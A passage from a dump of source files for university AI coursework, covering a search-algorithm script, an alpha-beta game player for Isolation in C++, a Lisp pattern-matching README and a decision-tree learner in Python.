parse_state(sys.argv[2])\n\n print \"Training patterns: maximum training depth is %d\" % maxtraindep\n print \"Cutoff depth for DFS and IDFS is %d\" % maxdepth\n print \"Cutoff nodes visited for uniform/greedy/astar search is %d\" % maxnodes\n\n t = time.clock()\n train(goal)\n print \"Training time: \", time.clock() - t, \" cpu seconds\"\n\n algos = [bfs,dfs,idfs,uniform,astar,greedy,astar_lc,greedy_lc,astar_pattern]\n\n t = time.clock() \n solutions = [solve(start, goal, algo) for algo in algos]\n print \"Running time: \", time.clock() -t\n \n for solution in solutions:\n print solution\n \n"
},
{
"alpha_fraction": 0.7022222280502319,
"alphanum_fraction": 0.7022222280502319,
"avg_line_length": 16.30769157409668,
"blob_id": "fb13b3e9ffc4933876eae0f1b8210aa101fc76e6",
"content_id": "73dac4c28947e7acd6a312eeefa49e9fbe60e296",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 13,
"path": "/isolation/src/util.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef UTIL_H_\n#define UTIL_H_\n\n#include \"types.h\"\n\nvoid print(Board board, Position playerA, Position playerB);\n\nbool getpos(Board board, int row, int col);\n\nvoid setpos(Board &board, int row, int col);\n\n\n#endif // UTIL_H_\n"
},
{
"alpha_fraction": 0.6737043857574463,
"alphanum_fraction": 0.7087332010269165,
"avg_line_length": 29.632352828979492,
"blob_id": "0b0f1d64e1aea26ffe2182373718c5e8c21fc3ba",
"content_id": "471097925e220ec6717a529d9d3f3f1cfd4d7204",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2084,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 68,
"path": "/pattern-match/README.md",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "Pattern Match\n\nCOMS 4701 Artificial Intelligence Project 1\n\n=============\n\nInput format: \n(load \"match-pre.lisp\") or (load \"match-post.lisp\")\n\n(pattern-match pattern data)\n---------------------------\n\nExamples:\n\n(pattern-match '(?x 2 (?x)) '(1 2 (1))) \n((?x 1))\n \n(pattern-match '(?x 2 (?x)) '(3 2 (1))) \nNIL\n \n(pattern-match '(1 (* ?x *)) '(1 (a (b c) d))) \n(((?x a)) ((?x (b c))) ((?x d)))\n\n\nPattern matching can be modeled as a search problem on the syntax tree\nof pattern and data. We use DFS search to search for matching\npatterns.\n\nHere, I implemented two versions of pattern matching. The first\nversion 'match-post.lsp\" uses post-order traversal in DFS. The other\nversion, 'match-pre.lsp\" searches in pre-order.\n\nPost-order traversal first generates the bindings for subtrees before\nexamining the consistency with their parents. In the pre-order traversal\nversion, bindings are passed from parents to their children. If there\nis conflicts when matching children, nil value is returned. If no\nconflict is found, we expand the binding and continue to search down.\n\n \n---------------------------\nMore about testing\n---------------------------\n'test.lsp' is a simple test script to check the\nresult.\n(runtest) validates the correctness of our implementations.\n\nNote that if it prints out \"Test fails\", it does not necessarily mean the answer is not correct. In some test cases, I am just producing the result in different orders. The order should not matter.\n\n(time (runtesttime)) tests the performance of our implementations.\n\n\nHere is the profiling result running the compiled version in clisp on my desktop:\n\nPerformance of post-order version:\nReal time: 0.779717 sec.\nRun time: 0.776048 sec. \nSpace: 14240000 Bytes \nGC: 16, GC time: 0.020001 sec.\n\nPerformance of pre-order version:\nReal time: 0.80227 sec.\nRun time: 0.80005 sec.\nSpace: 20480000 Bytes\nGC: 24, GC time: 0.024 sec.\n\nPost-order version is slightly faster than the pre-order version and\nits space usage is only half the size of the pre-order version. But\nits code size is slightly more than the pre-order version.\n\n"
},
{
"alpha_fraction": 0.595652163028717,
"alphanum_fraction": 0.602173924446106,
"avg_line_length": 17.399999618530273,
"blob_id": "5393ad4b1e2c37be04567ad66825d77ce6e8865c",
"content_id": "671205c4ba995f1248cbb13d7df330248b5bd8dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 920,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 50,
"path": "/isolation/src/human.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef HUMAN_H_\n#define HUMAN_H_\n\n#include <sstream>\n#include \"game.h\"\n#include \"types.h\"\n#include \"player.h\"\n\nclass HumanPlayer : public Player\n{\n private:\n\tbool parse_string(string str, int *row, int *col) {\n\t\tistringstream iss(str);\n\t\tiss >> *row >> *col >> std::ws;\n\t\tif (iss.fail() || !iss.eof())\n\t\t\treturn false;\n\t\telse\n\t\t\treturn true;\n\t}\n\n public:\n HumanPlayer(string name) : Player(name) {}\n\n\tvirtual Position Move(Board board, Position my, Position her)\n\t{\n\t\t\n\t\tif (IsDead(board, my)) {\n\t\t\tcout << \"I have no way to go...\" << endl;\n\t\t\treturn Position(-1, -1);\n\t\t}\n\n\t\tint row, col;\n\t\tcout << \">>\";\n\n\t\tstring str;\n\t\tgetline(cin, str);\n\n\t\t// Validate the move\n\t\twhile (!parse_string(str, &row, &col) || !ValidateMove(board, my, Position(row-1, col-1))) {\n\t\t\tcout << \"Invalid move, please try again.\" << endl;\n\t\t\tcout << \">>\";\n\t\t\tgetline(cin, str);\n\t\t}\n\t\treturn Position(row-1, col-1);\n\t}\n\n};\n\n\n#endif // HUMAN_H_\n"
},
{
"alpha_fraction": 0.5888993144035339,
"alphanum_fraction": 0.6152398586273193,
"avg_line_length": 17.327587127685547,
"blob_id": "c198dbde75875e420a5959ac0600425b0f8b5214",
"content_id": "aba05994550b9da278a82e42667ee19427490fc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1063,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 58,
"path": "/isolation/src/game.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef GAME_H_\n#define GAME_H_\n\n#include <vector>\n\n#include \"types.h\"\n#include \"player.h\"\n\nconst int kBoardSize = 8;\nconst Board kInvalidBoard = 0L;\nconst char kFirstSymbol = 'x';\nconst char kSecondSymbol = 'o';\nconst Position kFirstPos(0,0);\nconst Position kSecondPos(7,7);\n\nconst int kOffsets[8][2] = {\n\t{-1,0},{1,0},{0,-1},{0,1},\n\t{-1,-1},{-1,1},{1,-1},{1,1}};\n\n\n/*******************************************\n * Utilities\n ******************************************/\nbool ValidateMove(Board board, Position current, Position move);\nbool IsDead(Board board, Position pos);\nstd::vector<Action> GenerateActions(Board board, Position cur);\n\nclass Player;\n\nclass Game\n{\n private:\n\tBoard board_;\n\tPosition positions_[2];\n\tPlayer *players_[2];\n\n\tvoid ApplyMove(int mover, Position move);\n\tvoid Gameover(int mover);\n\n public:\n\n\tGame();\n\n\t~Game();\n\n\tvoid AddFirstPlayer(Player *player) {\n\t\tplayers_[0] = player;\n\t}\n\tvoid AddSecondPlayer(Player *player) {\n\t\tplayers_[1] = player;\n\t}\n\t\n\t// return the index of the winner\n\tint Play();\n\tvoid Print();\n};\n\n#endif // GAME_H_\n"
},
{
"alpha_fraction": 0.5647441744804382,
"alphanum_fraction": 0.5748780369758606,
"avg_line_length": 28.171533584594727,
"blob_id": "1679dca18acdf1f4e9779d277c97b57f8faed065",
"content_id": "4f9ddf7c90998e389101f63927bbcee7f8d3fdc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7993,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 274,
"path": "/decision/learn.py",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\nfrom math import log\n\nval2id = [] # maps value to id\nid2val = [] # maps id to value\n\nclass DecisionTree:\n def __init__(self, pivot):\n self.pivot = pivot\n self.children = []\n\n def __str__(self):\n import StringIO\n s = StringIO.StringIO()\n print_tree(self, s)\n return s.getvalue()\n\n def add_child(self, child):\n self.children.append(child)\n\ndef print_tree(tree, output=sys.stdout):\n f = output\n def _print_tree(tree, level):\n f.write('\\t' * level)\n if isleaf(tree):\n f.write(id2val[-1][tree] + '\\n')\n else:\n f.write('*'+str(tree.pivot)+'*:\\n')\n for c in enumerate(tree.children):\n f.write('\\t' * level)\n f.write('<'+id2val[tree.pivot][c[0]]+'>\\n')\n _print_tree(c[1], level+1)\n \n _print_tree(tree, 0)\n\ndef isleaf(tree):\n return not isinstance(tree, DecisionTree)\n\nclass Codegen:\n def __init__(self, outfile):\n self.outfile = outfile\n self.indent = 0\n \n def fill(self, text=''):\n self.f.write('\\n' + self.indent * '\\t' + text)\n\n def write(self, text):\n self.f.write(text)\n\n def enter(self):\n self.indent += 1\n\n def leave(self):\n self.indent -= 1\n \n def gen_header(self):\n self.write('#!/usr/bin/python\\n')\n self.write('import sys\\n')\n self.fill()\n\n def gen_main(self):\n self.fill(\"if __name__=='__main__':\")\n self.enter()\n self.fill(\"if len(sys.argv) != 2:\")\n self.enter()\n self.fill(\"print 'Usage: python \" + self.outfile + \" testfile'\")\n self.fill(\"sys.exit(1)\")\n self.leave() # leave if\n self.fill(\"testfile=sys.argv[1]\")\n self.fill('lines = open(testfile).readlines()')\n self.fill('for line in lines:')\n self.enter()\n self.fill(\"record = [field.strip() for field in line.split(',')]\")\n self.fill(\"print 'Classifying:', record\") \n self.fill(\"result=classify(record)\")\n self.fill(\"print '-->', result\")\n self.leave() # leave for\n self.leave() # leave if __main__\n self.fill()\n\n def gen_func(self, tree):\n self.fill('def classify(record):')\n self.enter()\n self.gen_classify(tree)\n self.leave() # leave def\n self.fill()\n\n # recursively call gen_classify to generate code\n # only need to change the indentation level\n def gen_classify(self, tree):\n if isleaf(tree):\n self.fill('return \"' + str(id2val[-1][tree]) + '\"')\n return\n values = id2val[tree.pivot]\n for idx in range(len(values)):\n if (idx == 0):\n self.fill(str.format('if record[%d]==\"%s\":' % (tree.pivot, values[idx])))\n else:\n self.fill(str.format('elif record[%d]==\"%s\":' % (tree.pivot, values[idx])))\n self.enter()\n self.gen_classify(tree.children[idx])\n self.leave()\n\n\n # generate code for this decision tree \n # the code generated is a single function\n # that consists mostly of branches\n # the essence is to encode the tree model\n # into your code, instead of the other way around\n def gencode(self, tree):\n self.f = open(self.outfile, 'w')\n self.gen_header()\n self.gen_func(tree)\n self.gen_main()\n self.f.close()\n\ndef majority(examples):\n # generic majority\n count = [0] * len(id2val[-1])\n for example in examples:\n count[example[-1]] += 1\n return count.index(max(count))\n\ndef all_same(examples):\n assert examples\n result = examples[0][-1]\n for example in examples[1:]:\n if example[-1] != result: return False\n return True\n\n# generic count\ndef count_value(examples, attr, val):\n return len(filter(lambda x : x[attr]==val, examples))\n\n \n# def count_positive(examples):\n# return len(filter(lambda x : x[-1]==1, examples))\n# def count_negative(examples):\n# return len(filter(lambda x : x[-1]==0, examples))\n\n\ndef importance(examples, attr):\n # generic entrophy\n def entrophy(hist):\n total = sum(hist)\n hist = filter(lambda x : x > 0, hist)\n qs = [1.0 * h / total for h in hist]\n e = -sum([q * log(q, 2) for q in qs])\n return e\n\n # def boolean_entrophy(p, n):\n # if p == 0 or n == 0: return 0 # entropy is 0\n # q = 1.0 * p / (p + n)\n # e = -(q*log(q,2) + (1-q)*log(1-q,2))\n # print e, entrophy([p, n])\n # assert entrophy([p, n]) == e\n # return e\n\n remainder = 0\n d = len(val2id[attr])\n goals = len(val2id[-1])\n for k in range(d):\n exsi = select(examples, attr, k)\n\n hist = [count_value(exsi, -1, v) for v in range(goals)]\n # positives = count_positive(exsi)\n # negatives = count_negative(exsi)\n # e = 1.0 * len(exsi) / len(examples) \\\n # * boolean_entrophy(positives, negatives)\n e = 1.0 * len(exsi) / len(examples) \\\n * entrophy(hist)\n remainder += e\n\n hist = [count_value(examples, -1, v) for v in range(goals)]\n gain = entrophy(hist) - remainder\n\n # positives = count_positive(examples)\n # negatives = count_negative(examples)\n # gain = boolean_entrophy(positives, negatives) - remainder\n return gain\n \ndef select(examples, attr, val):\n match = filter(lambda x: x[attr]==val, examples)\n return match\n\ndef decision_tree_learning(examples, attributes, parent_examples):\n if not examples: return majority(parent_examples)\n if all_same(examples): return examples[0][-1]\n if not attributes: return majority(examples)\n\n gains = [importance(examples, attr) for attr in attributes]\n pivot = attributes[gains.index(max(gains))]\n \n tree = DecisionTree(pivot)\n d = len(val2id[pivot])\n for k in range(d):\n exs = select(examples, pivot, k)\n nattributes = filter(lambda x: x != pivot, attributes)\n subtree = decision_tree_learning(exs, nattributes, examples)\n assert isinstance(subtree, DecisionTree) or isinstance(subtree, int)\n tree.add_child(subtree)\n return tree\n \n\ndef print_examples(examples):\n for example in examples:\n print decode(example)\n\ndef decode(example):\n record = [id2val[item[0]][item[1]] for item in enumerate(example)]\n return record\n\ndef encode(record):\n global val2id, id2val\n example = []\n for f in range(len(record)):\n domain = val2id[f]\n coding = domain.get(record[f], len(domain))\n if coding == len(domain):\n val2id[f].update({record[f]:coding})\n id2val[f].update({coding:record[f]})\n example.append(coding)\n return example\n\ndef read_data(datafile):\n global val2id, id2val\n examples = []\n lines = open(datafile).readlines()\n assert lines\n\n fields = len(lines[0].split(','))\n # initialize domain mapping\n val2id = [{} for i in range(fields)]\n id2val = [{} for i in range(fields)]\n\n for line in lines:\n # extract the record\n record = [field.strip() for field in line.split(',')]\n # encode record with integer category\n example = encode(record)\n examples.append(example)\n return examples\n\ndef classify(tree, record):\n example = encode(record)\n while isinstance(tree, DecisionTree):\n child = example[tree.pivot]\n tree = tree.children[child]\n result = id2val[-1][tree]\n assert result == record[-1]\n return result\n\n\nif __name__=='__main__':\n if len(sys.argv) < 3:\n print \"Usage: python learn.py training_data output_file\"\n sys.exit(1)\n\n training = sys.argv[1]\n outfile = sys.argv[2]\n\n examples = read_data(training)\n\n attributes = list(range(len(id2val)-1))\n tree = decision_tree_learning(examples, attributes, None)\n\n print tree\n\n codegen = Codegen(outfile)\n codegen.gencode(tree)\n\n print \"Classifier generated in: \", outfile\n"
},
{
"alpha_fraction": 0.517241358757019,
"alphanum_fraction": 0.5287356376647949,
"avg_line_length": 13.5,
"blob_id": "c182a546bc0ccc041f61791d547eec637e4b8160",
"content_id": "f93d1a50f392398f1f5c749dfecbb60e6e60bbf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 6,
"path": "/isolation/src/Makefile",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "CC=g++\nCFLAGS=-Wall -O3\nLIBS=-lm\n\nall : *.cc *.h\n\t$(CC) -o test $(CFLAGS) *.cc $(LIBS)\n"
},
{
"alpha_fraction": 0.6816479563713074,
"alphanum_fraction": 0.6816479563713074,
"avg_line_length": 13.052631378173828,
"blob_id": "4989db386cab9ae795469f9a5334c60f3510a7cc",
"content_id": "1f7fa6bc0a8439528f6357335fbe66a9562cfab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 19,
"path": "/isolation/src/dumb.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef DUMB_H_\n#define DUMB_H_\n\n#include \"player.h\"\n\nclass DumbPlayer : public Player\n{\n public:\n DumbPlayer(string name) : Player(name) {}\n\n\tvirtual Position Move(Board board, Position my, Position her)\n\t{\n\t\treturn RandomMove(board, my);\n\t}\n\n};\n\n\n#endif // DUMB_H_\n"
},
{
"alpha_fraction": 0.7331863045692444,
"alphanum_fraction": 0.7436603903770447,
"avg_line_length": 23.849315643310547,
"blob_id": "941d77bffa2c55d91fad9b63b577153412160c04",
"content_id": "713e27f151e010794f409248377c405bd47e6716",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1814,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 73,
"path": "/isolation/src/nplayer.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef AGGR_PLAYER_H_\n#define AGGR_PLAYER_H_\n\n#include <cassert>\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <stdlib.h>\n\n#include \"game.h\"\n#include \"types.h\"\n#include \"table.h\"\n#include \"player.h\"\n\nusing namespace std;\n\nclass Game;\n\nclass AggressivePlayer : public Player\n{\n private:\n\tstatic const int kMidGameSteps = 5;\n\tstatic const int kEndGameSteps = 10;\n\n\tstatic const int kEagerGameSteps = 15;\n\n\tstatic const int kMaxDFSDepth = 20;\n\n\tstatic const int kDefaultMaxDepth = 5;\n\tstatic const int kMidGameMaxDepth = 7;\n\tstatic const int kEndGameMaxDepth = 11;\n\n\tstatic const unsigned int kMaxIsolationNodes = 100000;\n\n\tdouble Eval2(Board board, Position my, Position her);\n\tdouble Eval(Board board, Position my, Position her, int depth);\n\tbool Cutoff(Board board, Position my, Position her, int depth);\n\n\tPosition AlphaBeta(Board board, Position my, Position her);\n\n\tScoreAction MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n\tScoreAction MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n bool IsIsolated(Board board, Position my, Position her);\n\tint MaxClosureDFS(Board board, Position cur, int depth, int maxdepth);\n\tint MaxClosure(Board board, Position cur);\n\tPosition LocalMove(Board board, Position my);\n\tint DoLocalMove(Board board, Position cur);\n\n\tTable table_;\n\n\tbool isolated_;\n\tint hersteps_;\n\n\tint steps_;\n\n public:\n AggressivePlayer(string name) : Player(name), isolated_(false), hersteps_(IMAX), steps_(0) {}\n\n\tvirtual Position Move(Board board, Position my, Position her);\n\n};\n\n\nBoard TryMove(Board board, Position cur, Direction dir, unsigned int nsteps);\nPosition MakeMove(Position cur, Action action);\nPosition RandomMove(Board board, Position current);\n\n\n#endif // PLAYER_H_\n"
},
{
"alpha_fraction": 0.6517701745033264,
"alphanum_fraction": 0.6579222083091736,
"avg_line_length": 21.909574508666992,
"blob_id": "f8f9b379aabdfe5638ea65cefd49e3b380618ab9",
"content_id": "573f4f993f8593a100750e1966aeb6868ac6d90b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8615,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 376,
"path": "/isolation/src/player.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <limits>\n#include <queue>\n#include <set>\n#include <stdio.h>\n#include <stdlib.h>\n\n#include \"types.h\"\n#include \"player.h\"\n#include \"game.h\"\n#include \"table.h\"\n#include \"util.h\"\n\nusing namespace std;\n\nPosition RandomMove(Board board, Position current)\n{\n\tvector<Action> actions = GenerateActions(board, current);\n\tif (actions.empty()) {\n\t\treturn Position(-1, -1);\n\t}\n\telse {\n\t\tAction action = actions[rand() % actions.size()];\n\t\treturn MakeMove(current, action);\n\t}\n}\n\n\nbool MyPlayer::IsIsolated(Board board, Position my, Position her)\n{\n\t// check the table first\n\tint lookup = table_.isolated(board, my, her);\n\n\tif (lookup == 1)\n\t\treturn true;\n\telse if (lookup == -1)\n\t\treturn false;\n\t\n\t// BFS\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, my, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, my));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes)\n\t\t\treturn false;\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\t\t\t// we are reachable\n\t\t\tif (next == her) {\n\t\t\t\ttable_.insert(board,my,her,false);\n\t\t\t\treturn false;\n\t\t\t}\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))\n\t\t\t\t&& visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t}\n\t\t}\n\t}\n\n\ttable_.insert(board,my,her,true);\n\treturn true;\n}\n\n\n// return the maximum number of steps\n// conditioned on that we are isolated\n// this is deterministic\nint MyPlayer::MaxClosure(Board board, Position cur)\n{\n\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes)\n\t\t\treturn (int)(maxsteps * 1.2); // relax\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn maxsteps;\n}\n\nBoard TryMove(Board board, Position cur, Direction dir, unsigned int nsteps)\n{\n\tint row = cur.row, col = cur.col;\n\tint ro = kOffsets[dir][0];\n\tint co = kOffsets[dir][1];\n\t\n\tint rend = row + ro*nsteps;\n\tint cend = col + co*nsteps;\n\n\tBoard nboard = board;\n\tif (rend < 0 || cend < 0 ||\n\t\trend >= kBoardSize || cend >= kBoardSize)\n\t\treturn kInvalidBoard;\n\n\tfor (unsigned int step = 1; step <= nsteps; step++) {\n\t\tint r = row + ro * step, c = col + co * step;\n\t\tif (getpos(board, r, c)) {\n\t\t\treturn kInvalidBoard;\n\t\t}\n\t}\n\tsetpos(nboard, rend, cend);\n\n\treturn nboard;\n}\n\nPosition MakeMove(Position cur, Action action)\n{\n\tint row = cur.row, col = cur.col;\n\tint ro = kOffsets[action.dir][0];\n\tint co = kOffsets[action.dir][1];\n\n\treturn Position(row+ro*action.steps, col+co*action.steps);\n}\n\n// Estimate the likelihood that we are isolated\n// and she controls more squres than me\ndouble MyPlayer::Eval(Board board, Position my, Position her)\n{\n\t// Version 1:\n\t// number of empty slots I can move / number of slots she can move\n\n\tvector<Action> myactions = GenerateActions(board, my);\n\tvector<Action> heractions = GenerateActions(board, her);\n\n\t// she cannot move\n\t// we win!\n\tif (heractions.size() == 0)\n\t\treturn DMAX;\n\n\treturn 1.0 * myactions.size() / heractions.size();\n}\n\n\nbool MyPlayer::Cutoff(Board board, Position my, Position her, int depth)\n{\n\treturn (depth > kMaxDepth);\n}\n\n\nint MyPlayer::DoLocalMove(Board board, Position cur)\n{\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps) {\n\t\t\tmaxsteps = node.depth;\n\t\t\t\n\t\t\t// early termination\n\t\t\tif (maxsteps > hersteps_) \n\t\t\t\treturn maxsteps;\n\t\t}\n\n\t\tfrontier.pop();\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn maxsteps;\n}\n\n\n// Find the next best local move\nPosition MyPlayer::LocalMove(Board board, Position my)\n{\n\t//\tcout << \"Local move start\" << endl;\n\tPosition best = Position(-1,-1);\n\tint maxsteps = 0;\n\tfor (int d = 0; d < 8; d++) {\n\t\tPosition next = MakeMove(my, Action((Direction)d, 1));\n\t\tBoard nboard=TryMove(board, my, (Direction)d, 1);\n\t\tif (nboard) {\n\t\t\tint steps = DoLocalMove(nboard, next);\n\t\t\tif (steps >= maxsteps) {\n\t\t\t\tmaxsteps = steps;\n\t\t\t\tbest = next;\n\t\t\t\tif (steps > hersteps_) // we only need to do better than her\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\thersteps_--;\n\t//\tcout << \"Local move end\" << endl;\n\treturn best;\n}\n\n\n\nPosition MyPlayer::AlphaBeta(Board board, Position my, Position her)\n{\n\tdouble alpha = DMIN;\n\tdouble beta = DMAX;\n\n\tScoreAction sa = MaxValue(board, my, her, alpha, beta, 0);\n\n\tif (sa.action.steps == -1) {\n\t\tcout << \"We will lose. But try our best.\" << endl;\n\t\treturn LocalMove(board, my);\n\t}\n\n\tif (TryMove(board, my, sa.action.dir, sa.action.steps)) {\n\t\treturn MakeMove(my, sa.action);\n\t}\n\telse {\n\t\treturn Position(-1, -1);\n\t}\n}\n\nScoreAction MyPlayer::MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// I lose\n\tif (IsDead(board, my))\n\t\treturn ScoreAction(DMIN, kInvalidAction);\n\n\t// She lose\n\tif (IsDead(board, her)) {\n\t\tvector<Action> actions = GenerateActions(board, my);\n\t\treturn ScoreAction(DMAX, actions[0]);\n\t}\n\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, my, her), kInvalidAction);\n\n\tAction maxaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, my);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(my, action);\n\n\t\tBoard nboard;\n\t\tdouble score;\n\t\tif (!(nboard = TryMove(board, my, d, steps)))\n\t\t\tcontinue;\n\n\t\tscore = MinValue(nboard, npos, her, alpha, beta, depth+1).score;\n\n\t\tif (score > alpha) {\n\t\t\talpha = score;\n\t\t\tmaxaction = Action(d,steps);\n\t\t}\n\n\t\tif (alpha >= beta)\n\t\t\treturn ScoreAction(alpha, maxaction);\n\t}\n\n\treturn ScoreAction(alpha, maxaction);\n}\n\n\nScoreAction MyPlayer::MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// She lose\n\tif (IsDead(board, her))\n\t\treturn ScoreAction(DMAX, kInvalidAction);\n\n\t// I lose\n\tif (IsDead(board, my)) {\n\t\tvector<Action> actions = GenerateActions(board, her);\n\t\treturn ScoreAction(DMIN, actions[0]);\n\t}\n\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, her, my), kInvalidAction);\n\n\tAction minaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, her);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(her, action);\n\n\t\tBoard nboard;\n\t\tdouble score;\n\t\tif (!(nboard = TryMove(board, her, d, steps))) // she tries to move\n\t\t\tcontinue;\n\n\t\tscore = MaxValue(nboard, my, npos, alpha, beta, depth+1).score;\n\n\t\tif (score < beta) {\n\t\t\tbeta = score;\n\t\t\tminaction = Action(d, steps);\n\t\t}\n\n\t\tif (beta <= alpha)\n\t\t\treturn ScoreAction(beta, minaction);\n\t}\n\n\treturn ScoreAction(beta, minaction);\n}\n\n\nPosition MyPlayer::Move(Board board, Position my, Position her)\n{\n\tif (isolated_) // if isolated, do local move!\n\t\treturn LocalMove(board, my);\n\telse { // otherwise, adversial game!\n\t\t// check isolation\n\n\t\tbool test = IsIsolated(board, my, her);\n\t\tif (test) {\n\t\t\tcout << \"Switching to local mode.\" << endl;\n\t\t\tisolated_ = true;\n\t\t\thersteps_ = MaxClosure(board, her);\n\t\t\treturn LocalMove(board, my);\n\t\t}\n\t\telse\n\t\t\treturn AlphaBeta(board, my, her);\n\t}\n}\n\n"
},
{
"alpha_fraction": 0.5350978374481201,
"alphanum_fraction": 0.5466052889823914,
"avg_line_length": 17.10416603088379,
"blob_id": "fe8eee3ffe25695b4c18384ea2295a97fc9d489a",
"content_id": "1557e6e51674e30fed12995e307e4a0df512cc00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 869,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 48,
"path": "/isolation/src/util.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
